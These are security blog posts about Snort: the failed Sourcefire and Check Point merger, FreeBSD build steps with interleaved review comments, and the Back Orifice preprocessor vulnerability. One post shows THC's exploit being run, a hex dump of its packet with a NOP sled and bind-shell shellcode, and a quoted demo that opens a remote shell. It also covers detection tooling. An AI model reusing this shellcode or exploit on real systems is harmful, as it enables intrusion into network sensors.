Sourcefire, Inc., the world leader in intrusion prevention, today announced that, with the consent of the US government, Sourcefire and Check Point Software Technologies have opted to withdraw their merger filing with the Committee on Foreign Investment in the United States (CFIUS). Sourcefire will continue to operate as the industry's largest private Intrusion Prevention System (IPS) vendor.

According to Check Point's press release:

The companies have determined that it would be more effective to create a customer focused business partnership. "We've decided to pursue alternative ways for Check Point and Sourcefire to partner in order to bring to market the most comprehensive security solutions," said Gil Shwed, Check Point's CEO.

Check Point and Sourcefire will continue to create and distribute the best security solutions in their respective spaces. They will work together on formulating a partnership strategy moving forward and will keep customers and partners updated as new plans are developed.


Their FAQ says this:

Is the Sourcefire acquisition cancelled?

We can still pursue the acquisition but at this point we will explore other opportunities. We will also focus on running our business and delivering the best solutions for customers.


Wow, it's cancelled -- despite what Check Point says. I thought this deal would go through, albeit with restrictions.

Friday, 10 March 2006

Snort 2.6 BETA on FreeBSD

This week Sourcefire released Snort 2.4.4 and Snort 2.6 BETA. Because a ports tree freeze is in effect in preparation for FreeBSD 5.5 and 6.1, the Snort port will not be updated to 2.4.4 soon. If you want to install 2.4.4 using the ports tree, make the following changes to /usr/ports/security/snort/Makefile:

orr:/usr/ports/security/snort$ diff Makefile.orig Makefile
9,10c9,10
< PORTVERSION= 2.4.3
< PORTREVISION= 1
---
> PORTVERSION= 2.4.4
> #PORTREVISION= 1
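
Review bot: commenting out PORTREVISION leaves a stale `#PORTREVISION= 1` line behind; since PORTVERSION has just moved to 2.4.4, the ports convention is to delete the PORTREVISION line altogether (it comes back, starting at 1, only when the port changes without a version bump), so `#PORTREVISION= 1` should simply be removed.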

Make these changes to distinfo:

orr:/usr/ports/security/snort$ diff distinfo.orig distinfo
1,6c1,3
< MD5 (snort-2.4.3.tar.gz) = 5c3c8c69f2459bbe0c1f2057966c88a7
< SHA256 (snort-2.4.3.tar.gz) = 4f3aa911234a9fc4beb5ba9b0fe88f1e3af0fcbfe84d4448415f049b9791bc65
< SIZE (snort-2.4.3.tar.gz) = 2733590
< MD5 (snort-2.4.3.tar.gz.sig) = 680b271bb3fe67bd28d41d5a3886865a
< SHA256 (snort-2.4.3.tar.gz.sig) = a7fa680662124e6f95eb87b88e09a0ec7ae394f6845f4a1eada4626066da12d0
< SIZE (snort-2.4.3.tar.gz.sig) = 65
---
> MD5 (snort-2.4.4.tar.gz) = fe82febd153e121369788b3aaa05d415
> SHA256 (snort-2.4.4.tar.gz) = 9d34822e68d6c5bfd98c41f14bf9185424691824b220d70366c40f0477e9d9a7
> SIZE (snort-2.4.4.tar.gz) = 2825060
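
Review bot: the replacement drops the three lines for snort-2.4.3.tar.gz.sig without recording anything for snort-2.4.4.tar.gz.sig, while the Makefile change above touches only PORTVERSION and PORTREVISION. If DISTFILES still lists the signature file, `make checksum` will stop with a no-checksum-recorded error for it; either add MD5/SHA256/SIZE lines for snort-2.4.4.tar.gz.sig as well or confirm the .sig is no longer fetched by the port.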

You can then build the port with 'make' and 'make install', and end up running Snort 2.4.4:

$ snort -V

,,_ -*> Snort! <*-
o" )~ Version 2.4.4 (Build 28)
'''' By Martin Roesch & The Snort Team: http://www.snort.org/team.html
(C) Copyright 1998-2005 Sourcefire Inc., et al.
NOTE: Snort's default output has changed in version 2.4.1!
The default logging mode is now PCAP, use "-K ascii" to activate
the old default logging mode.

To try Snort 2.6 BETA, you'll need to follow these steps. First, you need the devel/automake19, devel/libtool15, and devel/autoconf259 ports installed.

Now check out the Snort BETA from CVS.

cvs -d:pserver:anonymous@cvs.snort.org:/cvsroot login
cvs -d:pserver:anonymous@cvs.snort.org:/cvsroot co -r SNORT_2_6 snort
cd snort

Make the following changes to autojunk.sh:

orr:/home/richard/snort$ diff autojunk.sh.orig autojunk.sh
3,7c3,7
< libtoolize --automake --copy
< aclocal -I m4
< autoheader
< automake --add-missing --copy
< autoconf
---
> libtoolize15 --automake --copy
> aclocal19 -I m4 -I /usr/local/share/aclocal
> autoheader259
> automake19 --add-missing --copy
> autoconf259
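
Review bot: the added `-I /usr/local/share/aclocal` on the aclocal19 line makes aclocal scan every installed macro file, which is where the underquoted-definition warnings for gtk.m4, glib.m4, audiofile.m4, ao.m4 and aalib.m4 in the run below come from; they concern those unrelated files, not Snort's configure.in, so they can be ignored. The hard-coded 15/19/259 suffixes tie the script to these exact FreeBSD port versions, so it will need the same treatment again when the automake or autoconf ports move on.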

These changes are needed because the FreeBSD ports install the autotools under version-suffixed names, as the following directory listings show:

# ls -al /usr/local/bin/libtoolize*
-r-xr-xr-x 1 root wheel 10784 Feb 6 04:08 /usr/local/bin/libtoolize15
# ls -al /usr/local/bin/aclocal*
-r-xr-xr-x 1 root wheel 19737 Feb 6 19:47 /usr/local/bin/aclocal19
# ls -al /usr/local/bin/autoheader*
-r-xr-xr-x 1 root wheel 8141 Feb 6 17:55 /usr/local/bin/autoheader259
# ls -al /usr/local/bin/automake*
-r-xr-xr-x 1 root wheel 222000 Feb 6 19:47 /usr/local/bin/automake19
# ls -al /usr/local/bin/autoconf*
-r-xr-xr-x 1 root wheel 7672 Feb 6 17:55 /usr/local/bin/autoconf259

You've got to make one more change, to src/dynamic-plugins/sf_engine/Makefile.am. Change the two instances of 'cp $< $@' to 'cp $? $@' as shown below.

orr:/home/richard/snort/src/dynamic-plugins/sf_engine$ diff Makefile.am.orig Makefile.am
28c28
< cp $< $@
---
> cp $? $@
31c31
< cp $< $@
---
> cp $? $@
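
Review bot: `$?` is not a drop-in replacement for `$<`: it expands to every prerequisite newer than the target, so lines 28 and 31 stay equivalent to the original only if each rule has exactly one prerequisite; with several, `cp` would be handed multiple source files and a non-directory destination and fail. Worth confirming that both rules list a single dependency, or naming the source file explicitly instead of using an automatic variable. The change itself is needed because POSIX/BSD make defines `$<` only inside suffix (inference) rules, whereas `$?` is defined everywhere.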

When these changes are made, run 'sh autojunk.sh' from the snort directory. You'll see some errors, but they are not fatal.

orr:/home/richard/snort$ sh autojunk.sh
configure.in:170: warning: underquoted definition of SN_CHECK_DECL
run info '(automake)Extending aclocal'
or see http://sources.redhat.com/automake/automake.html#Extending-aclocal
configure.in:203: warning: underquoted definition of SN_CHECK_DECLS
configure.in:303: warning: underquoted definition of FAIL_MESSAGE
/usr/X11R6/share/aclocal/gtk.m4:7: warning: underquoted definition of AM_PATH_GTK
/usr/local/share/aclocal/glib.m4:8: warning: underquoted definition of AM_PATH_GLIB
/usr/local/share/aclocal/audiofile.m4:12: warning: underquoted definition of AM_PATH_AUDIOFILE
/usr/local/share/aclocal/ao.m4:9: warning: underquoted definition of XIPH_PATH_AO
/usr/local/share/aclocal/aalib.m4:12: warning: underquoted definition of AM_PATH_AALIB

After that, run the following:

./configure
make
make install

Remember you'll probably want to run 'make install' as root.

When done, Snort 2.6 BETA will be installed.

orr:/home/richard/snort$ snort -V

,,_ -*> Snort! <*-
o" )~ Version 2.6.0 (Build 48)
'''' By Martin Roesch & The Snort Team: http://www.snort.org/team.html
(C) Copyright 1998-2005 Sourcefire Inc., et al.

Let us know how you find Snort 2.6. Thank you to Steven Sturges from Sourcefire for getting this to work for me!

Thursday, 23 February 2006

Feds Delay Check Point Acquisition of Sourcefire

Based on a friend's tip, I found myself looking for this press release, which reads in part:

Check Point® Software Technologies Ltd. (NASDAQ: CHKP), the world leader in securing the Internet, received notice its pending acquisition of Sourcefire®, Inc. has moved into the investigative stage with the Committee on Foreign Investment in the United States ("CFIUS").

In order to clear the transaction with the United States Government, Check Point submitted two regulatory applications. Check Point received U.S. anti-trust approval and was advised that CFIUS would continue reviewing the application during a 45-day investigative period...

Pursuant to the Exon-Florio legislation, CFIUS reviews proposed foreign acquisitions of U.S. companies in order to protect national security while maintaining the credibility of the United States open investment policy. The Exon-Florio legislation provides for a 30-day review following notification of a potential acquisition. CFIUS has the option to extend the review period for an additional 45-day review (or "investigation").


That press release excerpt sounds fairly tame, but this article is more interesting:

CFIUS has 30 days in which to examine an acquisition. It can extend that period by 45 days for the purposes of investigation. This is exactly what has happened to Check Point. What's more, once the status of an examination becomes "investigative", the acquisition comes under the purview of none other than US President George W. Bush. At the end of the 45 days, CFIUS submits a report to the president, who must announce his decision within 15 days.

All in all then, taking into account the initial 30 day period, the 45 day investigation period, and the 15 days for the presidential decision, it can take 90 days from the initial examination of the application until the president informs Congress whether he chooses to block the deal or not. For Check Point, only the first 30 days have gone by, so that, theoretically, closure of the deal could be put back to the second quarter...

In the case of Check Point and Sourcefire, it is still not clear what the cause of CFIUS's concern is. It is a fairly rare occurrence for it to choose to investigate such a low-value deal.


Another friend pointed me to this article:

Most foreign U.S. deals are approved after CFIUS completes an informal 30-day probe, but this transaction has raised the eyebrows of some of the panel members, leading to the lengthier examination.

"The fact that they launched a 45-day review means that some serious concerns are being raised," said a national security consultant who formerly worked at the Department of Defense.

Sources said CFIUS representatives from the Department of Defense and the Department of Homeland Security are worried that the deal gives critical computer network security technology to Israel. Sourcefire develops network security and information management systems for Defense Department agencies, in addition to private industry clients.


I'll keep my eye on this. I bet the deal will go through, with the government getting source code access to all Sourcefire products.

Friday, 27 January 2006

Snort.org Posts BlackWorm Packet Captures

The folks at Sourcefire have done the analyst community a great service by posting traffic captures of CME-24, aka "BlackWorm". Kudos also to the Common Malware Enumeration project for providing an easy way to reference malware! Once OpenPacket.org gets going, I hope to host these sorts of captures there.

Update: Check out this Sourcefire VRT analysis.

Friday, 28 October 2005

First Hampton Roads, VA Snort Users Group Meeting

My friend David Bianco is organizing a Hampton Roads, VA Snort Users Group. The first meeting will be 1 December 2005. Check out the story for more details!

Tuesday, 25 October 2005

Snort BO Exploit Published

As I expected, FrSIRT published an exploit for the Snort Back Orifice vulnerability discovered last week. I was able to compile and execute this code by RD of THC.org on FreeBSD 5.4.

orr:/home/richard$ ./THCsnortbo 66.93.110.10 1
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org

Selected target:
1 | manual testing gcc with -O0

Sending exploit to 66.93.110.10
Done.
orr:/home/richard$ ./THCsnortbo 66.93.110.10 2
Snort BackOrifice PING exploit (version 0.3)
by rd@thc.org

Selected target:
2 | manual testing gcc with -O2

Sending exploit to 66.93.110.10
Done.

Here is what the traffic looks like:

09:30:36.134739 IP 192.168.2.5.56292 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0bdb 0000 4011 f669 c0a8 0205 E.......@..i....
0x0010: 425d 6e0a dbe4 0035 0580 9592 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf d45a 5a79 4d8a b466 aaa2 c875 .....ZZyM..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-
0x0200: 6dd4 db5c 6988 2c69 a2f8 86d7 e3f5 8cef m..\i.,i........
0x0210: bfd8 e157 5219 6de6 6ac2 02b7 46a3 409d ...WR.m.j...F.@.
0x0220: 1d87 d616 42e7 4962 c75d fa55 00dc 234b ....B.Ib.].U..#K
0x0230: 295e e29c 8a9e 5a91 1a87 76d5 a26c 4f0f )^....Z...v..lO.
0x0240: 035a 7030 5b2b 18e8 833c 1f9e 1d41 3ddf .Zp0[+...<...A=.
0x0250: ad38 2755 c4bb 9cfc 25da bf52 2208 258e .8'U....%..R".%.
0x0260: 86d5 f2d2 f9dc 1fa3 ff7d 5ed9 62ce 4112 .........}^.b.A.
0x0270: 512e 188b 69da 1af2 1343 2656 4ee0 8aa0 Q...i....C&VN...
0x0280: 8fe0 8406 a602 265d e2e9 ff0e d8ca 788d ......&]......x.
0x0290: c068 bda6 0042 9d19 6d0a 53e8 af7a 46ed .h...B..m.S..zF.
0x02a0: 25a3 ad51 2966 577b b5a6 2aa6 85bd 2a57 %..Q)fW{..*...*W
0x02b0: 7fae 7dad 31bb cd19 ba18 0e90 ccff 203e ..}.1..........>
0x02c0: 70e6 b67e ea4e 18a8 1e9d 67a9 74ae 9fb9 p..~.N....g.t...
0x02d0: 38e8 82c9 252c d29b 8313 1e17 2df8 e1fb 8...%,......-...
0x02e0: 38b1 88d3 9223 53c9 2776 fd5f aa67 3f7a 8....#S.'v._.g?z
0x02f0: 121e 7221 c37f 1427 2ee4 4ca5 7bab 71cb ..r!...'..L.{.q.
0x0300: 868c c978 484e ae69 383a f58e 312f f223 ...xHN.i8:..1/.#
0x0310: 16f8 36fe 93bb 7aa4 a5d4 41a1 fdc2 58b7 ..6...z...A...X.
0x0320: a1df a196 1455 522e f8af b7c1 306e 7fbc .....UR.....0n..
0x0330: 2a7e 3527 dd49 adbb 1049 2334 5b83 7ee7 *~5'.I...I#4[.~.
0x0340: 9232 7a55 1f42 86c0 6e1f 6b1e 508d 8f6c .2zU.B..n.k.P..l
0x0350: b899 b925 2acf d5d3 358d 5a25 1e78 8b61 ...%*...5.Z%.x.a
0x0360: 1f6e 5bdc 10fc 94c8 e511 b96d 1712 2a5c .n[........m..*
0x0370: 480f e81f 41b6 5ab5 3e67 f01d ada8 86d0 H...A.Z.>g......
0x0380: 72d9 8b54 4f6a c2ee 426c 6858 ef06 18d3 r..TOj..BlhX....
0x0390: 4009 4bfe 8a06 04e8 32de 2bc3 f0fa 389a @.K.....2.+...8.
0x03a0: 93fd b3c4 a576 59f9 8f7a 2284 a051 c09a .....vY..z"..Q..
0x03b0: 8a70 0aea 8e87 fa75 1a9c b4a0 1078 0968 .p.....u.....x.h
0x03c0: 68c0 bbb5 9807 a152 f4a2 0d9c b1fc 4c58 h......R......LX
0x03d0: 2ecb 6d4a f482 8684 fd88 73dc b489 2121 ..mJ......s...!!
0x03e0: 5b4c eacf 73e5 c2a0 372c 9145 4a6d 62b6 [L..s...7,.EJmb.
0x03f0: 5261 dc27 e57d ce3c c3ca d05e 44f5 274e Ra.'.}.<...^D.'N
0x0400: 1467 cab9 db78 63cc 62e0 b80a 734e cb5c .g...xc.b...sN.
0x0410: a01c 5ea8 4782 9bc6 d52a 134e 88a4 e5b6 ..^.G....*.N....
0x0420: b91b 813b 5ac8 4e7d dca6 c911 55e5 4ff1 ...;Z.N}....U.O.
0x0430: 9f83 5c16 8477 7529 d9b0 6336 e9aa 8210 ..\..wu)..c6....
0x0440: d5ef 789e 77bd 491c 2e92 e890 16bc d51e ..x.w.I.........
0x0450: f8fd 1e58 2446 23ee fa37 8841 3e90 9090 ...X$F#..7.A>...
0x0460: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0470: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0480: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0490: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04a0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04b0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04c0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04d0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04e0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x04f0: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0500: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0510: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0520: 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0530: 9090 9090 9090 9090 9090 9090 9090 31db ..............1.
0x0540: 5343 536a 026a 6658 9989 e1cd 8096 4352 SCSj.jfX......CR
0x0550: 6668 7a69 6653 89e1 6a66 5850 5156 89e1 fhzifS..jfXPQV..
0x0560: cd80 b066 d1e3 cd80 5252 5643 89e1 b066 ...f....RRVC...f
0x0570: cd80 936a 0259 b03f cd80 4979 f9b0 0b52 ...j.Y.?..Iy...R
0x0580: 682f 2f73 6868 2f62 696e 89e3 5253 89e1 h//shh/bin..RS..
0x0590: cd80 0000 ....
09:30:49.654205 IP 192.168.2.5.55465 > 66.93.110.10.53: 52835 updateD ServFail [5863q][|domain]
0x0000: 4500 0594 0be4 0000 4011 f660 c0a8 0205 E.......@..`....
0x0010: 425d 6e0a d8a9 0035 0580 8ec2 ce63 d1d2 B]n....5.....c..
0x0020: 16e7 13cf 1fa1 a586 4d8a b466 aaa2 c875 ........M..f...u
0x0030: 2309 78b2 e0d4 ef49 8a8e 39e5 aa8a 4d0d #.x....I..9...M.
0x0040: 22b5 3751 6ec9 9763 29e3 8469 f317 7430 ".7Qn..c)..i..t0
0x0050: f162 20c3 d501 a47b c0a0 c559 a5d5 96b2 .b.....{...Y....
0x0060: b04f fc0b 6749 d086 70c3 e65b 93f2 8c0a .O..gI..p..[....
0x0070: 0197 140f 95ce 3598 3a88 2fb3 cdbb ae2b ......5.:./....+
0x0080: 0458 7135 0f1e 8b06 be6d 2aa8 84bd 56ec .Xq5.....m*...V.
0x0090: da50 3ca1 a785 0b46 be2e bf3c a9a5 dd80 .P<....F...<....
0x00a0: 855a de98 ed70 cf8c 3cc9 b7f7 8ddf 3b7d .Z...p..<.....;}
0x00b0: 0595 ffbf f38d 4e6d 769b 7c1c c159 6a58 ......Nmv.|..YjX
0x00c0: 3b5c 6a7b 8aa8 43df f0c0 9710 36a0 0306 ;\j{..C.....6...
0x00d0: e92e 8752 824e a6b6 4a75 d07a bdc1 9e1c ...R.N..Ju.z....
0x00e0: ce27 bee7 6c6c d148 c458 303d a7a8 d68e .'..ll.H.X0=....
0x00f0: 6e43 7a81 5a50 fb69 81a6 e17e c6a3 c293 nCz.ZP.i...~....
0x0100: a7e1 a244 3d06 ffce 003a ac84 c95f 1bbf ...D=....:..._..
0x0110: bcbc a1d5 86bb d48d 0374 5852 c349 1b46 .........tXR.I.F
0x0120: ad73 deb9 25fc b51a 8a4f b14d 03cd bbfe .s..%....O.M....
0x0130: 9c22 a315 eb17 1bab f848 1d1b 3c39 143c .".......H..<9.<
0x0140: e965 5a0e 0a78 bd94 6cde 07a1 feda 7f15 .eZ..x..l.......
0x0150: 35db aa6a 13ac 966a 096b 98e4 7a9d 94be 5..j...j.k..z...
0x0160: 6100 7dcd 76e0 dee3 ae4e 78a8 e16e 0c8c a.}.v....Nx..n..
0x0170: 6f70 1c5b 2522 ee93 bca4 1132 04fc 4294 op.[%".....2..B.
0x0180: 3f0a 901b b0fe dfef 76e9 ca89 b472 6d4a ?.......v....rmJ
0x0190: b3ca e2b1 09c1 2a6d bcfa afd0 a2bd 2745 ......*m......'E
0x01a0: 2b6d dbc3 41d9 6941 6e96 a76d 9fcc 49f8 +m..A.iAn..m..I.
0x01b0: 880f a4b4 2812 1401 0e17 1be4 dc2a ebd9 ....(........*..
0x01c0: 8b0f 864b 10f9 8481 1dfc 559b 2b45 67fd ...K......U.+Eg.
0x01d0: 7609 8a6b 093b 32f7 1ce2 3df6 fbea 7699 v..k.;2...=...v.
0x01e0: 49fa 39db 25a6 f877 0c05 ddfc 3f26 b002 I.9.%..w....?&..
0x01f0: 06be fc5f 55a6 4db6 6d83 7dd0 8645 2f2d ..._U.M.m.}..E/-

I ran this traffic by a local sensor running Snort 2.3.3 on FreeBSD 5.4 and it continued to function. There was no DoS or exploit. RD's exploit as written targets Linux. His demo exploits a 2.6 kernel:

* $ ./snortbo 192.168.0.101 1
* Snort BackOrifice PING exploit (version 0.3)
* by rd@thc.org
*
* Selected target:
* 1 | manual testing gcc with -O0
*
* Sending exploit to 192.168.0.101
* Done.
*
* $ nc 192.168.0.101 31337
* id
* uid=104(snort) gid=409(snort) groups=409(snort)
* uname -sr
* Linux 2.6.11-hardened-r1

Kyle Haugsness wrote a tool and rules to detect the Snort BO exploit, which you might find useful. By following the directions in the code I got it to work on FreeBSD 5.4:

orr:/home/richard$ gcc -Wall -lpcap -o ident-snort-bo-exploit ident-snort-bo-exploit.c
orr:/home/richard$ sudo ./ident-snort-bo-exploit
# Using interface: fxp0
# Using alert output file: stdout
# Using pcap output file: snort-bo-exploit-2005-10-25-09:46:54.cap
#
##############################################
#
# Detected exploit attempt! (details below)
# Note that shellcode should start after 9th
# byte into the payload below (the 8 byte
# magic value has been removed and the
# remainder of the header is 9 bytes).
#
##############################################
#
# Date/time: Tue Oct 25 09:47:21 2005
# Source IP: 192.168.2.5
# Dest IP: 66.93.110.10
# Source port: 64544
# Dest port: 53
# UDP data len: 1400
# BO key (dec): 31337
# BO key (hex): 0x7A69
# BO data len: -18 (UDP len - 17 byte BO header)
# BO pkt id: -1
# BO pkt type: 0x01 (0x01 = PING)
#
# Decrypted BO data:
#
0x0000: FF FF FF FF FF FF FF FF 01 90 90 90 90 90 90 90 ................
0x0010: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0x0020: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
...edited...
0x0550: 3D AA E7 D7 80 CA 0F 07 36 14 2A 0C 65 08 05 8C =.......6.*.e...
0x0560: EE 97 25 0C 0F 90 66 06 2B 5B E2 3C CE E9 14 4B ..%...f.+[.<...K
0x0570: 00 00 00 00 00 00 00 00 ........
#
# Decoded packet num: 1; Exploit: yes; Timestamp: Tue Oct 25 09:47:21 2005
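
The header fields the detector prints (the 8-byte magic it strips, the 17-byte header, key 31337/0x7A69, a data length computed as the declared length minus 17, the packet id and the PING type) can be recovered with a small parser. This is an added example, not Kyle Haugsness's tool or Snort's own code; the magic cookie value, the little-endian signed header fields and the LCG keystream are assumptions about the Back Orifice protocol as Snort's spp_bo preprocessor models it, and both sample packets are constructed here, with filler in place of any payload.

```python
import struct

# Assumed (not on the page): BO header layout and keystream as spp_bo models them.
BO_MAGIC = b"*!*QWTY?"      # 8-byte magic cookie the detector strips off
BO_HEADER_LEN = 17          # 8 magic + 4 length + 4 id + 1 type
BO_DEFAULT_KEY = 31337      # 0x7A69, the key the detector reported
BO_TYPE_PING = 0x01

def bo_keystream(key, n):
    """n keystream bytes from the MSVC-style LCG seeded with the 16-bit key."""
    hold = key & 0xFFFFFFFF
    out = bytearray()
    for _ in range(n):
        hold = (hold * 214013 + 2531011) & 0xFFFFFFFF
        out.append((hold >> 16) & 0xFF)  # ((hold >> 16) & 0x7fff) % 256
    return bytes(out)

def bo_crypt(data, key):
    """XOR with the keystream; the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, bo_keystream(key, len(data))))

def parse_bo(udp_payload, key):
    """Decrypt the header under key; return its fields, or None if the magic fails."""
    if len(udp_payload) < BO_HEADER_LEN:
        return None
    hdr = bo_crypt(udp_payload[:BO_HEADER_LEN], key)
    if hdr[:8] != BO_MAGIC:
        return None
    length, pkt_id = struct.unpack_from("<ii", hdr, 8)  # signed, as the tool prints
    return {
        "key": key,
        "bo_len": length,
        "bo_data_len": length - BO_HEADER_LEN,  # the tool's "len - 17 byte BO header"
        "pkt_id": pkt_id,
        "pkt_type": hdr[16],
        "udp_data_len": len(udp_payload),
        # A well-formed packet declares its own total length; a negative or
        # oversized value is the inconsistency a detector should alert on.
        "suspicious": length < BO_HEADER_LEN or length > len(udp_payload),
    }

def find_bo_key(udp_payload):
    """Brute-force the 16-bit key space as spp_bo does: the first eight
    decrypted bytes must equal the magic. Returns the key or None."""
    head = udp_payload[:8]
    for key in range(65536):
        if bo_crypt(head, key) == BO_MAGIC:
            return key
    return None

def build_bo_packet(length, pkt_id, pkt_type, data, key):
    """Assemble and encrypt a BO packet (used only to construct samples)."""
    hdr = BO_MAGIC + struct.pack("<ii", length, pkt_id) + bytes([pkt_type])
    return bo_crypt(hdr + data, key)

# Constructed samples: a benign PING whose declared length matches its size,
# and a 1400-byte packet whose decrypted header reads FF*8 01 like the one
# in the detector output above (filler bytes instead of a payload).
BENIGN = build_bo_packet(BO_HEADER_LEN + 4, 1, BO_TYPE_PING, b"ping", BO_DEFAULT_KEY)
MALFORMED = build_bo_packet(-1, -1, BO_TYPE_PING, b"A" * 1383, BO_DEFAULT_KEY)
```

Running `parse_bo(MALFORMED, find_bo_key(MALFORMED))` reproduces the detector's numbers: UDP data len 1400, key 31337, BO data len -18, pkt id -1, pkt type 0x01.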

On a related note, I saw Tom Ptacek comment on my earlier post. Tom says:

"There is nothing wrong with looking for vulnerabilities in your competitor's products, and Neel Mehta has built enough of a rep for himself that he doesn't need to take 'marching orders' from anybody."

I agree there is nothing wrong with looking for vulnerabilities in your competitor's products. However, are we supposed to believe that Neel Mehta, an ISS X-Force researcher, developed this exploit on his own? Are we supposed to think he did not do this at the direction of his employer, who published an advisory? If Neel discovered this vulnerability on his own, and not while working for ISS, why did Sourcefire learn of the vulnerability from US-CERT and not Neel himself?

Saturday, 22 October 2005

The Coming Snort Worm

This week we learned via an advisory of a vulnerability in the Back Orifice preprocessor in Snort versions 2.4.2, 2.4.1, and 2.4.0. The vulnerability was discovered by another ISS X-Force researcher. I bet (but have no inside knowledge) that he was following the same marching orders that Mike Lynn received: find vulnerabilities in competitors' products. Mike looked at Cisco, and Neel Mehta looked at Sourcefire's Snort.

I am sure ISS is still bitter over the Witty worm that revealed the installed ISS RealSecure and BlackIce userbase to be about 12,000 systems. The Witty worm spread via a single UDP packet with a fixed UDP source port of 4000.

Let's consider the factors that lead me to believe that the Snort BO vulnerability will produce a worm.

  1. The new vulnerability can be exploited by a specially crafted UDP packet to or from any port other than port 31337. (Thanks to Jose Nazario for correcting me on this point.) This is similar to the UDP packet used by Witty. UDP is an ideal worm vector, as demonstrated by Slammer. There is no need for a TCP handshake, which means spoofing is much easier.

  2. Sensors need not be directly targeted. All a worm has to do is send exploit UDP traffic to a segment monitored by a vulnerable Snort sensor. The attacker need not know anything about the target's management IP address.

  3. Snort has been in the news recently as a result of its acquisition by Checkpoint. A worm coder can kill or embarrass two birds with one UDP stone.

  4. Snort is everywhere -- .com, .net, .org, .edu, .gov, etc. 0wning a .mil or .gov Snort sensor gives intruders the ultimate vantage point over a monitored network. I imagine sophisticated intruders have already compromised a slew of sensitive Snort sensors, but at some point a lower life form will decide to turn the exploit into a worm.

  5. Snort source code is available, so comparing 2.4.0-2.4.2 with 2.4.3 means the vulnerability can be quickly identified.


I can imagine a few factors that will reduce the likelihood of a worm.

  1. The vulnerability reportedly exists in Snort versions 2.4.0 through 2.4.2. That's a narrow set of versions, given Snort 2.4.0 was released in July. I have heard of users running Snort 1.8.x and 1.9.x; they complain about rules that don't work with their versions. Argh!

  2. Snort runs on a huge number of platforms. That is one of the beauties of the program. Will a worm target Snort on Linux? If so, what distro/kernel/version/etc.? How about Snort on Windows? That would make the most sense -- the OS would be fairly similar, and the user base would make for good targets. We'll see.

  3. Sophisticated intruders will keep any exploit to themselves. They may try to keep it out of the hands of the bottom feeders.


What do you think? Will we see a Snort worm? I'm keeping an eye on FrSIRT.

On a related note, be sure to upgrade to Ethereal 0.10.13 -- 0.10.12 has bugs too.

Thursday, 13 October 2005

Bejtlich Quotes in Sourcefire Acquisition Story

Eric B. Parizo mentioned me in his story Snort users fear future under Check Point. One of the quotes appears as follows:

Richard Bejtlich, principal with Washington, D.C.-based consultancy Tao Security, said many fail to realize just how expensive it is to support a product like Snort.

"I've been to Sourcefire, and I've seen how many people they have working on the product and on signatures," Bejtlich said. "They have what seems like millions and millions of racks of equipment. I was surprised they were able to continue with Snort as they did."


That should say "millions and millions of dollars of racks of equipment." I obviously haven't seen millions of racks of anything when I visit Sourcefire!

